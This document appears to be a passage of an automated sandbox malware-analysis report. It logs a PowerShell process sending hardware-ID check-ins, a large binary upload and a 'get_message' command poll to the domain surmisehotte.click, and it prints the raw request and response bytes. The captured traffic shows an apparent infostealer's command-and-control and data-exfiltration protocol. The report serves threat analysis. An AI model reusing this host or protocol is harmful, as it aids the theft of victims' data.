                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ftXdXz1JLT4MOCg%2FtcqWZUHE40hn8U%2FyMMUOQt16HIzokt4oDs3Yqub3GZlRBtUR%2FJ0R8y%2BTuFGJjYfbbQnbQssLIaqi8q%2FWJ26hSYjYeeygtKFWVHgFNe7vZP0XoM5%2BSCkKdFc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f5a7e5ae8984c13-MIA
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=128863&min_rtt=128780&rtt_var=27299&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21525&delivery_rate=29677&cwnd=252&unsent_bytes=0&cid=b5f1824c6f894dc5&ts=1006&x=0"
                                                                                                                                                                                                                                                      2024-12-21 20:06:36 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 12ok 102.129.152.205
                                                                                                                                                                                                                                                      2024-12-21 20:06:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      13192.168.11.2049774104.21.96.14439160C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:06:37 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=ZABVSMIPP0
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 1230
                                                                                                                                                                                                                                                      Host: surmisehotte.click
                                                                                                                                                                                                                                                      2024-12-21 20:06:37 UTC1230OUTData Raw: 2d 2d 5a 41 42 56 53 4d 49 50 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 36 37 38 31 36 33 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 5a 41 42 56 53 4d 49 50 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 41 42 56 53 4d 49 50 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a 2d 2d 5a 41 42 56 53 4d 49 50 50 30 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                      Data Ascii: --ZABVSMIPP0Content-Disposition: form-data; name="hwid"71678163B129FD4CDB71E32F12885CB3--ZABVSMIPP0Content-Disposition: form-data; name="pid"1--ZABVSMIPP0Content-Disposition: form-data; name="lid"yJEcaG--singl6--ZABVSMIPP0Content
                                                                                                                                                                                                                                                      2024-12-21 20:06:37 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:06:37 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=uu08lb0ropco8tfsb995hbemfd; expires=Wed, 16 Apr 2025 13:53:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DiDDLcw864yhUHciv6gHf9hflE0qwKlHRdypqvJLuPzCdYthIuKOpemHG7kEmvW90I0FqDYDWocyfWCWC1oUzyeYYI0NUoqc%2BAa6kxX79r9ixfsuZJAsSXhk1pmPUdOu6AkTv6o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f5a7e632a3cd9dd-MIA
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129479&min_rtt=129372&rtt_var=27424&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2141&delivery_rate=29514&cwnd=252&unsent_bytes=0&cid=6892d4c91d74a7a7&ts=514&x=0"
                                                                                                                                                                                                                                                      2024-12-21 20:06:37 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 12ok 102.129.152.205
                                                                                                                                                                                                                                                      2024-12-21 20:06:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      14192.168.11.2049775104.21.96.14439160C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:06:38 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=9C1L2FFUKDYNR
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 1043766
                                                                                                                                                                                                                                                      Host: surmisehotte.click
                                                                                                                                                                                                                                                      2024-12-21 20:06:38 UTC15331OUTData Raw: 2d 2d 39 43 31 4c 32 46 46 55 4b 44 59 4e 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 36 37 38 31 36 33 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 39 43 31 4c 32 46 46 55 4b 44 59 4e 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 43 31 4c 32 46 46 55 4b 44 59 4e 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a 2d 2d 39 43 31 4c 32 46 46 55 4b 44
                                                                                                                                                                                                                                                      Data Ascii: --9C1L2FFUKDYNRContent-Disposition: form-data; name="hwid"71678163B129FD4CDB71E32F12885CB3--9C1L2FFUKDYNRContent-Disposition: form-data; name="pid"1--9C1L2FFUKDYNRContent-Disposition: form-data; name="lid"yJEcaG--singl6--9C1L2FFUKD
                                                                                                                                                                                                                                                      2024-12-21 20:06:38 UTC15331OUTData Raw: bc c3 97 0f 46 19 01 d1 00 9c b1 8a da cc f0 50 29 d1 d9 ef d7 2d 25 4f ec fc 56 cf 18 c1 d9 88 7f 75 03 33 17 0b 13 2a bc b7 b6 69 25 76 ec ad cb 60 0a 3a 40 70 37 30 91 92 71 4c 70 52 80 82 76 72 9c 5c db 17 21 1a 00 a4 a5 3b 42 40 c2 9b d8 d9 3c 28 91 bd 17 08 a6 a8 56 82 56 d9 c7 80 5d 1e 1e 88 3b 28 96 02 f6 2f 82 29 09 7f b6 af 16 59 2f 03 ab 4a fc 98 f5 c8 aa 05 68 f5 c4 79 a6 66 53 df 2a e7 39 29 f1 9c 89 ed 6f 3f 6b 01 21 a6 d6 14 76 38 61 73 a1 6c cb 20 2d 89 c4 ef 0a 47 0b fe c7 96 44 8b 83 ff 7b 1f c5 79 1b fe ad 28 30 a5 d5 03 ba 91 22 0f 34 9e 61 c6 40 98 b5 b7 f9 13 d5 68 2b bb 90 cd 63 57 c4 b2 27 d6 04 f9 0a b2 4c 5d 2e 4a cf fd 45 bc f3 35 0e e4 27 a6 90 df f6 b4 3d 3b 70 0c ac 20 17 d4 8e 39 06 a4 3f 8a 12 29 0e 99 62 d3 5a 04 93 33 93
                                                                                                                                                                                                                                                      Data Ascii: FP)-%OVu3*i%v`:@p70qLpRvr\!;B@<(VV];(/)Y/JhyfS*9)o?k!v8asl -GD{y(0"4a@h+cW'L].JE5'=;p 9?)bZ3
                                                                                                                                                                                                                                                      2024-12-21 20:06:38 UTC15331OUTData Raw: 1a 9e 10 b9 57 73 f7 e7 05 6c 12 01 15 eb b2 17 7a cd a2 9e ad 0d 54 6c 07 9b fd 95 96 28 03 af b4 62 3d 83 ef db 9a 20 06 9d f4 39 cf 8b c5 18 f3 b3 9b 16 d5 fd 17 04 59 2d f5 4d 0f 23 45 8d 2b 66 c6 b5 35 df a7 ed 25 24 b7 7d 11 4c 76 eb e9 1f 53 a0 ee 7c 13 a3 a6 c5 53 8f 68 a9 e9 cc 64 c3 6a 3b 5d 19 3d 0a 73 11 87 11 c1 f7 40 28 76 3a 93 c6 66 e6 7d de f4 48 f4 51 6a 21 b8 53 ca 2e 1b d9 9e 51 5c 48 0d 37 06 7b f9 54 0d 1a 53 a3 9f b9 53 1a fa 91 5d 1f cd 71 a1 4d a7 21 ce cc 8a 2b 03 9d ae 40 99 8d 8b 46 68 04 d4 c0 48 67 7c 2b a0 a3 cc ef cc ad bf 97 ba ce 40 1e 3c 88 a1 e2 59 ed 1b aa 54 27 a5 dc ee 35 af 6d 73 7a f4 f9 bb 6f 4c ae c3 28 65 1f aa 07 5d b8 15 e9 de 40 d5 20 4d 30 d0 46 13 78 a6 a0 9e 19 29 8e 20 44 7e e3 cc b9 5c df d2 64 46 6a 7d
                                                                                                                                                                                                                                                      Data Ascii: WslzTl(b= 9Y-M#E+f5%$}LvS|Shdj;]=s@(v:f}HQj!S.Q\H7{TSS]qM!+@FhHg|+@<YT'5mszoL(e]@ M0Fx) D~\dFj}
                                                                                                                                                                                                                                                      2024-12-21 20:06:38 UTC15331OUTData Raw: 04 77 1b 9d f3 f9 a6 84 90 f1 73 d9 d3 d9 6a ae 05 13 02 84 fa 47 54 5b 77 cd 1b 6c 69 25 04 c1 c0 85 f6 c7 bc 07 7a 4d 38 7e aa d8 cc e5 4d 4f de b5 d5 e3 4d 91 ba 7c 5d f0 a5 ed ef 81 43 56 1a ac 57 f3 68 5b bd 02 a7 57 95 ab c6 da cf 92 db c1 2e 4f 1b 85 1e 26 b7 08 a5 27 77 4e e6 97 a0 d8 bf db a3 cb f2 ab 63 6d c7 52 3a 33 d1 2f 4f c9 48 20 12 61 9f 49 8e d5 0f c4 9a 4e 42 8d 7a 64 3f b6 90 9b ed 46 4b a7 6a a9 fd 4f d6 46 ce ff ab 09 75 5e e8 b1 00 5c e5 7a 47 23 67 af 08 3b fe c0 6b 3c f4 05 55 8d 75 6c c0 fa ad 06 d0 0e 7d f5 14 99 a6 17 04 17 cd f9 6b 60 da 43 d4 80 7e 40 3e 7e 96 58 77 12 7f d5 3f 07 7f a6 a2 20 ab dd ea 0e 09 6b 52 18 1e 7c 55 74 14 b6 2b 63 18 3a 2c 1c 7d 03 46 f9 fb a4 0f 53 0f c3 82 89 40 02 ff 15 76 5e c8 7e d6 7f d6 7d ae
                                                                                                                                                                                                                                                      Data Ascii: wsjGT[wli%zM8~MOM|]CVWh[W.O&'wNcmR:3/OH aINBzd?FKjOFu^\zG#g;k<Uul}k`C~@>~Xw? kR|Ut+c:,}FS@v^~}
                                                                                                                                                                                                                                                      2024-12-21 20:06:38 UTC15331OUTData Raw: fc 45 4d 77 19 e9 a8 7a 04 12 92 7a 75 e7 83 68 50 eb a8 13 c7 ba 4f ef a9 02 39 69 cb 00 ba 59 01 50 d2 15 a4 44 46 05 cd e6 b0 0e e8 42 4a 76 4c 0c a1 09 70 1f 3c 7e bf 90 f7 23 c3 9c 69 0d 7a 1c 7e 72 c7 00 ba 17 12 0d 2a 45 0c 64 15 0c 0f 82 3c d4 89 87 3a 42 b3 b7 52 f8 14 0e 51 46 12 2b b6 05 8e 55 51 97 5a c8 47 7e bc c5 96 05 96 62 46 17 a1 40 a0 d8 20 d8 4d a5 fa 62 b7 18 d8 9c ae 36 ae d7 b2 49 83 cf 1c fe 6e 23 eb b7 4d 8a e1 df de 6d f3 5e 96 e7 97 75 50 7b af a8 3a ec 11 e8 23 5b 61 4d 32 0e 5a b7 92 48 41 4c 24 16 d8 a2 82 9b c7 63 34 46 9c 99 7a 5d 0a 6b 75 a9 f4 9f c9 98 8b 8b 60 bc 31 d7 7e bf 88 b7 eb 8d ea 12 5f 13 9d 6c 42 8d b3 49 d1 5a c5 37 dd 5a 47 73 cf ac 21 c0 fd 46 e3 6d 95 c7 1b a9 c1 fe 07 16 47 bc 90 45 9f ed 3c b4 82 ec 4a
                                                                                                                                                                                                                                                      Data Ascii: EMwzzuhPO9iYPDFBJvLp<~#iz~r*Ed<:BRQF+UQZG~bF@ Mb6In#Mm^uP{:#[aM2ZHAL$c4Fz]ku`1~_lBIZ7ZGs!FmGE<J
                                                                                                                                                                                                                                                      2024-12-21 20:06:38 UTC15331OUTData Raw: 38 8e f8 f9 81 e1 22 c9 6a 51 aa e6 b3 98 93 65 78 eb ed 40 48 a1 83 18 95 7a 74 fc 55 10 e3 e2 e7 43 9b 37 b3 b7 ca b3 bf 94 2d 1c 14 c8 7b 69 85 35 3e b1 f2 57 52 07 8b 40 29 2b aa 90 fb 65 77 2e 0b 25 95 76 90 5c d7 ed de 49 91 34 e8 bd ed 2f 21 af b7 2d e7 61 2a 10 aa 55 6a 69 a1 eb 46 63 92 6c f5 bd e2 e2 52 fa 57 fe 6a a3 13 46 f3 35 17 f7 ee a4 16 f7 f4 84 95 63 43 df 92 7f 1e 90 26 8c f2 a8 9b d2 43 94 d9 ef 81 45 eb 0d 21 71 48 6e 08 b4 e8 25 c5 10 1b 2e e0 fd a8 66 e3 62 fb 96 2a b6 63 f6 2f 0c fc f7 f8 75 11 c5 2b d0 76 4e 39 34 8f e5 c3 20 9b de 7d 41 19 2a da 52 ba a1 b3 77 f3 f7 48 69 c8 da 1f aa cf 8a e4 05 9d 53 bc a4 7a 07 d8 6c f8 df e5 56 bf 81 38 df 86 1a 2b 7c ff 3d 97 74 17 1a b0 e0 6f df 07 00 92 28 61 3f 0d 48 3b 7d 2c fa 88 4e 2e
                                                                                                                                                                                                                                                      Data Ascii: 8"jQex@HztUC7-{i5>WR@)+ew.%v\I4/!-a*UjiFclRWjF5cC&CE!qHn%.fb*c/u+vN94 }A*RwHiSzlV8+|=to(a?H;},N.
                                                                                                                                                                                                                                                      2024-12-21 20:06:38 UTC15331OUTData Raw: 1f fd 3b 90 2d bf b5 60 99 cb 30 6d 35 89 37 25 25 e7 e0 ae 12 ea ff 30 9b dc 86 2e 1c 17 05 43 a2 43 c5 60 77 e5 64 ca 72 1a 6a 63 82 57 d8 7e a8 ca 91 46 00 d5 5a 6c 40 57 03 f4 b1 0b bd a6 52 4c e8 0f 5d 0b fe c4 6f 4d c4 63 f4 3f fe 30 40 5b 84 2c ca 8a 7e 9a e8 92 9f 08 1b a9 a7 0e 4c c7 b6 25 91 34 e7 67 81 30 d5 2b c5 e6 8e f8 0e d3 ec 17 44 54 6b eb 85 02 95 6a c4 60 41 4c ad 38 43 8f 8d cc d5 99 b0 f2 20 e9 ba 13 79 90 27 d9 db e9 77 44 e9 03 eb b0 99 43 d3 e9 a1 7c 58 34 b4 c9 ec 41 d9 a4 b1 39 9e 50 44 65 0c aa 66 2e 77 2e 98 6e 27 3a c8 1f b1 de 4f 62 c9 42 a5 45 a6 b5 5f df 89 f7 a2 7b ee a2 cf 4e cb ef 9b 94 7c eb 90 26 48 4e a4 f9 cc b0 3b bc 6d 4d da 1d 0b 48 44 77 50 29 60 cf 22 5d 51 50 ac 53 15 1f 3d ed 9a ed b1 1f 63 71 f0 77 ef 93 dd
                                                                                                                                                                                                                                                      Data Ascii: ;-`0m57%%0.CC`wdrjcW~FZl@WRL]oMc?0@[,~L%4g0+DTkj`AL8C y'wDC|X4A9PDef.w.n':ObBE_{N|&HN;mMHDwP)`"]QPS=cqw
                                                                                                                                                                                                                                                      2024-12-21 20:06:38 UTC15331OUTData Raw: 43 db e8 6c 76 57 31 be 5f 83 10 30 9d 89 8d af f3 4f 3a ba dc 57 16 e5 9f fd 83 7e 6d bf ec e8 11 a1 ee f9 7b 3a 16 34 63 7e 26 4f 14 78 22 d2 04 1e 82 73 0e cb 8e ae 98 ef 58 28 00 74 70 4b 7b 60 c6 4b 84 63 28 22 bc b5 96 13 11 99 72 7c 23 d2 b7 04 5a ce 45 04 10 35 f6 b1 af b3 bb 0f 0d 33 f6 2f ec c3 87 7f a7 5e 69 fd 74 5a 45 3a 4b a8 e0 1b 0c 01 e2 29 21 27 6c 08 db 29 34 bb 58 2b c7 ba c7 75 30 e6 bc 0c d3 61 ed 01 ca dc 5d 3f 96 c0 1c 15 8b 0f 46 8c bf 60 84 11 99 83 87 b4 4f 58 b1 a5 91 ba 8c ee 76 92 da 13 f7 e0 4e 11 75 4a e3 3a cf c1 cd 58 6d 1c 6f e9 ff 4d 27 b9 28 42 a0 d2 78 8d fa 13 8c 2f 23 64 d1 0e e6 96 31 d3 8f cc ed d6 1d 70 70 ab d3 54 36 5b aa 6a 94 ac 62 1b 1e ba 99 ae f5 01 9b 7a ec 8a 90 6f 70 1d f8 7a 1c e3 53 a5 29 c8 e9 84 96
                                                                                                                                                                                                                                                      Data Ascii: ClvW1_0O:W~m{:4c~&Ox"sX(tpK{`Kc("r|#ZE53/^itZE:K)!'l)4X+u0a]?F`OXvNuJ:XmoM'(Bx/#d1ppT6[jbzopzS)
                                                                                                                                                                                                                                                      2024-12-21 20:06:38 UTC15331OUTData Raw: 5b e4 71 35 4e 16 16 a3 49 6b 46 9f 69 8c 9c e3 62 b3 1f d1 47 e0 5f 41 cc 5a 1e 42 db d6 22 61 72 7c f3 64 3b eb 26 d3 0d 75 c4 61 7b 2b c2 69 4e be 55 52 24 cf f0 19 ae a0 36 cd 71 db 89 d8 ad 13 fa 00 cf 4d c0 fb ed ff ae ee f2 d0 01 52 0f fc 27 56 70 51 01 9c 2a 20 5a 32 91 48 99 6a 43 89 cc 0e ac c2 5a e9 90 a4 29 24 9c 95 06 a9 6a 5a 93 52 a8 22 f9 5b 7d 32 29 3d ab 25 0c c4 32 25 af 3d 54 9a 19 14 68 1a 86 7f b3 12 bf 6f 9d ab 38 99 93 9b e9 55 e0 f8 9d 7b 83 ed a1 68 a1 2e 15 29 d7 19 c5 56 49 dd ec 99 5e 20 af 0d 98 ad 6b 37 74 0d f3 90 7b 55 5e 68 6a 25 d2 47 5f e1 0b dc 90 4d 69 79 58 46 cf 49 0a 53 aa 3d 45 9f e2 14 b6 bc d4 2e 61 a1 3b 36 cc ea a3 7b ad 15 a4 01 48 6a 7e 40 5f b3 e8 bb 62 43 72 f0 92 a2 a2 f7 c7 4d 98 ac 0b af 0e 79 30 c6 8d
                                                                                                                                                                                                                                                      Data Ascii: [q5NIkFibG_AZB"ar|d;&ua{+iNUR$6qMR'VpQ* Z2HjCZ)$jZR"[}2)=%2%=Tho8U{h.)VI^ k7t{U^hj%G_MiyXFIS=E.a;6{Hj~@_bCrMy0
                                                                                                                                                                                                                                                      2024-12-21 20:06:38 UTC15331OUTData Raw: 48 41 a2 e8 a3 58 b6 21 26 3c 16 72 2d a8 d2 8a a2 76 0e 86 b3 36 20 c5 fe 58 2f 0a b3 7c e2 33 db 65 af 2a 9c 92 25 b0 6b 22 b6 23 b8 00 c1 99 d2 1e cc 44 c7 be 7b d0 07 20 a6 8b 30 62 70 f2 dd 34 f7 38 10 e4 16 a8 fd d3 ca a8 7d f2 31 93 56 7b aa 3f 7b 6b d2 d8 a0 9f f4 70 33 91 f1 07 a3 37 d7 04 6e 57 e1 07 bf 0f eb 80 f2 1c 22 3b 23 63 97 e7 0d 43 f2 aa e1 b7 25 8f 00 bd 0b 9d 18 c7 93 9d e0 2a b1 32 02 1e 01 fc da 8a ce 5d 17 8f 33 3b 6d 05 a2 45 19 97 8a 56 9b f5 3f ac d3 7c 8a b7 d1 79 15 36 fe f1 37 6e 45 23 5d d0 29 2b 32 69 69 61 2b e2 b4 34 cf 56 f0 cd 25 6b 42 76 05 36 8d 3c 1c df be 4f 64 bb 2c 22 28 60 6c 4b d6 39 8a b3 29 e1 97 15 71 bb c6 2a 07 62 74 bd 12 4f 1b 44 62 80 d5 70 40 90 9a 2b 16 95 5d e3 31 e7 8d c5 5f 25 49 84 63 85 b8 64 f3
                                                                                                                                                                                                                                                      Data Ascii: HAX!&<r-v6 X/|3e*%k"#D{ 0bp48}1V{?{kp37nW";#cC%*2]3;mEV?|y67nE#])+2iia+4V%kBv6<Od,"(`lK9)q*btODbp@+]1_%Icd
                                                                                                                                                                                                                                                      2024-12-21 20:06:42 UTC1144INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:06:42 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=pcrvo1anccoub25bh7ov6goivp; expires=Wed, 16 Apr 2025 13:53:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abM3IGSsC96lhC1VQXfd%2FT8QlVgizjRDnO27VJIQqP2npV%2FEUTxACWV%2FMHPoaFTTGYsr3dng0lNv9hovvD25wtyOvEmb9IJ%2FiSA2hHPFZ5NHBkBdvawmH4FGh6saW%2FTYCMnQMGY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f5a7e6a3eb9334c-MIA
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129366&min_rtt=129309&rtt_var=27377&sent=351&recv=827&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1047675&delivery_rate=29560&cwnd=252&unsent_bytes=0&cid=b9e73c3a691d1035&ts=3948&x=0"


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      15192.168.11.2049776104.21.96.1443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:06:42 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 83
                                                                                                                                                                                                                                                      Host: surmisehotte.click
                                                                                                                                                                                                                                                      2024-12-21 20:06:42 UTC83OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 26 6a 3d 26 68 77 69 64 3d 37 31 36 37 38 31 36 33 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33
                                                                                                                                                                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=yJEcaG--singl6&j=&hwid=71678163B129FD4CDB71E32F12885CB3
                                                                                                                                                                                                                                                      2024-12-21 20:06:50 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:06:50 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=sab83s8nubpuf48ee6dc1hm32v; expires=Wed, 16 Apr 2025 13:53:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gP3gueWiGg4AxlIrtklXmDSaCelVWpvhMDZXrYtDZXsbrb7zjtNMzqEXVn8aj39CNFfHDVDSalOXC4SGYSMgISRsRn6CLdqgx1AQ0NPPw%2BYt8eiWwSOdmLZW2LguNnIMOeoSLsI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f5a7e85985e334c-MIA
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=130286&min_rtt=130072&rtt_var=27820&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=985&delivery_rate=29200&cwnd=252&unsent_bytes=0&cid=fd3f79657e22b7d8&ts=7856&x=0"
                                                                                                                                                                                                                                                      2024-12-21 20:06:50 UTC54INData Raw: 33 30 0d 0a 43 39 36 48 79 67 43 7a 4e 49 4b 6c 78 6c 69 39 6e 49 31 38 73 43 32 57 5a 2f 48 64 6f 63 46 65 4c 44 6a 76 42 70 65 44 45 70 56 51 67 77 3d 3d 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 30C96HygCzNIKlxli9nI18sC2WZ/HdocFeLDjvBpeDEpVQgw==
                                                                                                                                                                                                                                                      2024-12-21 20:06:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:15:04:38
                                                                                                                                                                                                                                                      Start date:21/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
